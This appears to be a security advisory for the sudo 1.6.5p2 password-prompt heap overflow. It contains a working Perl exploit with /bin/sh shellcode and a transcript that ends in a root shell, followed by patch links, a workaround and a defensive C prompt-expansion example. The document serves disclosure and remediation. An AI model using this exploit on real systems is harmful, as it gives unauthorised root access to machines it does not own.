Sudo password prompt vulnerability

Published: 2002-04-26
Updated: 2002-04-26
Severity: High
Threat level: local administrator privileges
Error type: boundary check error
Exploit mode: server mode

Affected systems
Sudo 1.6.5p2

Detailed description
sudo is a widely used tool that lets users run commands with the privileges of another user. sudo allows the user to supply their own password prompt; when parsing the -p argument, the user can use escape sequences that expand to the host name or the user name, but the length check applied to these names is incorrect, and the resulting heap corruption can be exploited to execute arbitrary commands. Whether this option exists depends on compile-time support, but binaries built with PAM support do include it. The length of the host name on the system is one of the factors that determine whether the flaw can be exploited.

Test code
    [venglin@clitoris sudo-1.6.5p2]$ cat babunia.pl
    $sudo = $ARGV[0];
    $prompt = "h%h%h%h%aaaaaaaaaaaaaaaaaaaah%";
    $prepad = 266;
    $postpad = 512;
    $retloc = hex(`objdump -R $sudo | grep '\\<_exit\\>' | cut -f1 -d' '`);
    $retad = 0x8063b10;
    $align = 20;
    print "Prompt: $prompt\n";
    print "Prepad: $prepad\n";
    print "Postpad: $postpad\n";
    print "Align: $align\n";
    print "_exit() @ ", sprintf("0x%x\n", $retloc);
    print "shellcode @ ", sprintf("0x%x\n", $retad);
    $testcode = "\xeb" . chr($align);
    $testcode .= "\x90" x $align;
    $testcode .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c";
    $testcode .= "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb";
    $testcode .= "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
    $frame = pack('l', 0x01010101);
    $frame .= pack('l', $retloc-12);
    $frame .= pack('l', $retad);
    $path = "a" x $prepad;
    $path .= $frame;
    $path .= $testcode;
    $path .= "a"x($postpad - length($testcode));
    system($sudo, "-p", $prompt, $path);
    [venglin@clitoris sudo-1.6.5p2]$ perl ./babunia.pl ./sudo
    Prompt: h%h%h%h%aaaaaaaaaaaaaaaaaaaah%
    Prepad: 266
    Postpad: 512
    Align: 20
    _exit() @ 0x805fe40
    shellcode @ 0x8063b10
    litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaah%
    Sorry, try again.
    litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI ¨¨ry again.
    litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI ¨¨ry again.
    ./sudo: 3 incorrect password attempts
    # id
    uid=0(root) gid=1000(users) egid=0(root) groups=1000(users),6(disk),23(audio),24(video)

Solution
Workaround: remove the setuid bit from sudo with chmod a-s, or remove every entry from /etc/sudoers.

Patches and upgrades, grouped by affected version:

Todd Miller Sudo 1.6:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.1:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.2:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
  Debian Upgrade sudo_1.6.2p2-2.2_alpha.deb  http://security.debian.org/dists/stable/updates/main/binary-alpha/sudo_1.6.2p2-2.2_alpha.deb
  Debian Upgrade sudo_1.6.2p2-2.2_arm.deb  http://security.debian.org/dists/stable/updates/main/binary-arm/sudo_1.6.2p2-2.2_arm.deb
  Debian Upgrade sudo_1.6.2p2-2.2_i386.deb  http://security.debian.org/dists/stable/updates/main/binary-i386/sudo_1.6.2p2-2.2_i386.deb
  Debian Upgrade sudo_1.6.2p2-2.2_m68k.deb  http://security.debian.org/dists/stable/updates/main/binary-m68k/sudo_1.6.2p2-2.2_m68k.deb
  Debian Upgrade sudo_1.6.2p2-2.2_powerpc.deb  http://security.debian.org/dists/stable/updates/main/binary-powerpc/sudo_1.6.2p2-2.2_powerpc.deb
  Debian Upgrade sudo_1.6.2p2-2.2_sparc.deb  http://security.debian.org/dists/stable/updates/main/binary-sparc/sudo_1.6.2p2-2.2_sparc.deb

Todd Miller Sudo 1.6.3 p7:
  Slackware Patch sudo.tgz  ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/packages/sudo.tgz  (Slackware 8.0)
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.3 p6:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.3 p5:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.3 p4:
  Slackware Patch sudo.tgz  ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/packages/sudo.tgz  (Slackware 7.1)
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.3 p3:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.3 p2:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.3 p1:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.3:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.4 p2:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.4 p1:
  Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-1.6.6-1U50_1cl.i386.rpm
  Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm  ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm  (Source RPM)
  Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm  ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm  (Source RPM)
  Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm  ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm  (Source RPM)
  Conectiva Upgrade sudo-1.6.6-1U51_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-1.6.6-1U51_1cl.i386.rpm
  Conectiva Upgrade sudo-1.6.6-1U51_1cl.src.rpm  ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/sudo-1.6.6-1U51_1cl.src.rpm  (Source RPM)
  Conectiva Upgrade sudo-1.6.6-1U60_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-1.6.6-1U60_1cl.i386.rpm
  Conectiva Upgrade sudo-1.6.6-1U60_1cl.src.rpm  ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sudo-1.6.6-1U60_1cl.src.rpm  (Source RPM)
  Conectiva Upgrade sudo-1.6.6-1U70_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-1.6.6-1U70_1cl.i386.rpm
  Conectiva Upgrade sudo-1.6.6-1U70_1cl.src.rpm  ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sudo-1.6.6-1U70_1cl.src.rpm  (Source RPM)
  Conectiva Upgrade sudo-1.6.6-1U8_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/8/RPMS/sudo-1.6.6-1U8_1cl.i386.rpm
  Conectiva Upgrade sudo-1.6.6-1U8_1cl.src.rpm  ftp://atualizacoes.conectiva.com.br/8/SRPMS/sudo-1.6.6-1U8_1cl.src.rpm  (Source RPM)
  Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm
  Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm
  Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm
  Conectiva Upgrade sudo-doc-1.6.6-1U51_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-doc-1.6.6-1U51_1cl.i386.rpm
  Conectiva Upgrade sudo-doc-1.6.6-1U60_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-doc-1.6.6-1U60_1cl.i386.rpm
  Conectiva Upgrade sudo-doc-1.6.6-1U70_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-doc-1.6.6-1U70_1cl.i386.rpm
  Conectiva Upgrade sudo-doc-1.6.6-1U8_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/8/RPMS/sudo-doc-1.6.6-1U8_1cl.i386.rpm
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
  Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-1.6.6-1U50_1cl.i386.rpm
  Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm  ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-1.6.6-1U50_1cl.i386.rpm

Todd Miller Sudo 1.6.4:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
  Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 7.1 i586)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.0 PPC, Source RPM)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.1 i586)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.1 i586, Source RPM)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.ia64.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.1 ia64)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.1 ia64, Source RPM)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.2 i586)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.2 i586, Source RPM)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.ppc.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.2 PPC)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.2 PPC, Source RPM)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Corporate Server 1.0.1)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Corporate Server 1.0.1, Source RPM)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Single Network Firewall 7.2)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Single Network Firewall 7.2, Source RPM)
  Red Hat Upgrade sudo-1.6.5p2-1.6x.1.src.rpm  ftp://updates.redhat.com/6.2/en/powertools/SRPMS/sudo-1.6.5p2-1.6x.1.src.rpm  (Source RPM)
  Red Hat Upgrade sudo-1.6.5p2-1.6x.1.alpha.rpm  ftp://updates.redhat.com/6.2/en/powertools/alpha/sudo-1.6.5p2-1.6x.1.alpha.rpm
  Red Hat Upgrade sudo-1.6.5p2-1.6x.1.i386.rpm  ftp://updates.redhat.com/6.2/en/powertools/i386/sudo-1.6.5p2-1.6x.1.i386.rpm
  Red Hat Upgrade sudo-1.6.5p2-1.6x.1.sparc.rpm  ftp://updates.redhat.com/6.2/en/powertools/sparc/sudo-1.6.5p2-1.6x.1.sparc.rpm
  Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm  ftp://updates.redhat.com/7.0/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm  (Source RPM)
  Red Hat Upgrade sudo-1.6.5p2-1.7x.1.alpha.rpm  ftp://updates.redhat.com/7.0/en/os/alpha/sudo-1.6.5p2-1.7x.1.alpha.rpm
  Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm  ftp://updates.redhat.com/7.0/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm
  Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm  ftp://updates.redhat.com/7.1/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm  (Source RPM)
  Red Hat Upgrade sudo-1.6.5p2-1.7x.1.alpha.rpm  ftp://updates.redhat.com/7.1/en/os/alpha/sudo-1.6.5p2-1.7x.1.alpha.rpm
  Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm  ftp://updates.redhat.com/7.1/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm
  Red Hat Upgrade sudo-1.6.5p2-1.7x.1.ia64.rpm  ftp://updates.redhat.com/7.1/en/os/ia64/sudo-1.6.5p2-1.7x.1.ia64.rpm
  Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm  ftp://updates.redhat.com/7.2/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm  (Source RPM)
  Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm  ftp://updates.redhat.com/7.2/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm
  Red Hat Upgrade sudo-1.6.5p2-1.7x.1.ia64.rpm  ftp://updates.redhat.com/7.2/en/os/ia64/sudo-1.6.5p2-1.7x.1.ia64.rpm
  Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 7.1 i586, Source RPM)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 7.2 i586)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 7.2 i586, Source RPM)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.0 i586)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.0 i586, Source RPM)
  Mandrake Upgrade sudo-1.6.4-3.1mdk.ppc.rpm  http://www.mandrakesecure.net/en/ftp.php  (Mandrake Linux 8.0 PPC)

Todd Miller Sudo 1.6.5 p2:
  Global InterSec Patch sudo-1.6.5p3.patch  http://www.globalintersec.com/adv/files/sudo-1.6.5p3.patch  (Unofficial source code patch from Global InterSec)
  NetBSD Patch netbsd-sudo-pwprompt.patch  http://downloads.securityfocus.com/vulnerabilities/patches/netbsd-sudo-pwprompt.patch  (Patch for the NetBSD port of sudo 1.6.5p2, for pkgsrc/security/sudo/patches)
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
  OpenBSD Patch 002_sudo.patch  ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/002_sudo.patch  (Patch for the OpenBSD 3.1 port of sudo)

Todd Miller Sudo 1.6.5 p1:
  Slackware Upgrade sudo-1.6.6-i386-1.tgz  ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/sudo-1.6.6-i386-1.tgz  (Slackware -current)
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Todd Miller Sudo 1.6.5:
  Todd Miller Upgrade sudo-1.6.6.tar.gz  ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Related information
Global InterSec Research (lists@globalintersec.com)
Reference: http://archives.neohapsis.com/archives/bugtraq/2002-04/0349.html
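The flaw in the description above is a mismatch between the length computed for the expanded prompt and what the expansion actually writes. The following is an added example, not sudo's code and not the patch listed above, of the defensive shape for such an expander: one tokenizer shared by the sizing pass and the writing pass, a writer that never exceeds the caller's buffer, and an allocating wrapper that refuses a result whose length disagrees with the size it computed. The treatment of unknown %x sequences and a trailing lone % (copied literally), and the sample user and host names, are assumptions of this example.

```c
#include <stdlib.h>
#include <string.h>

/* Expand %u (user), %h (host) and %% in a prompt template. Sizing and
 * writing share one tokenizer, so the returned length (without NUL and
 * independent of outsz) equals what a large enough buffer receives. At
 * most outsz-1 bytes plus a NUL are written; out may be NULL with outsz
 * 0 for a pure sizing pass. Assumption of this example: unknown %x
 * sequences and a trailing lone '%' are copied literally. */
size_t expand_prompt(const char *tmpl, const char *user, const char *host,
                     char *out, size_t outsz)
{
    size_t need = 0, pos = 0;
    const char *p = tmpl;
    while (*p) {
        const char *rep;   /* replacement bytes for the current token */
        size_t replen;
        if (p[0] == '%' && p[1] == 'u')      { rep = user; replen = strlen(user); p += 2; }
        else if (p[0] == '%' && p[1] == 'h') { rep = host; replen = strlen(host); p += 2; }
        else if (p[0] == '%' && p[1] == '%') { rep = "%";  replen = 1;            p += 2; }
        else                                 { rep = p;    replen = 1;            p += 1; }
        need += replen;
        if (out != NULL && outsz > 0 && pos < outsz - 1) {
            size_t room = outsz - 1 - pos;   /* bytes still free */
            size_t n = replen < room ? replen : room;
            memcpy(out + pos, rep, n);       /* may truncate, never overruns */
            pos += n;
        }
    }
    if (out != NULL && outsz > 0)
        out[pos] = '\0';
    return need;
}

/* Size, allocate, expand, then check that the writing pass produced
 * exactly the length the sizing pass promised; a disagreement is the
 * bug class in this advisory, so refuse the result. malloc'd or NULL. */
char *expand_prompt_dup(const char *tmpl, const char *user, const char *host)
{
    size_t need = expand_prompt(tmpl, user, host, NULL, 0);
    char *buf = malloc(need + 1);
    if (buf == NULL) return NULL;
    if (expand_prompt(tmpl, user, host, buf, need + 1) != need
        || strlen(buf) != need) {
        free(buf);
        return NULL;
    }
    return buf;
}
```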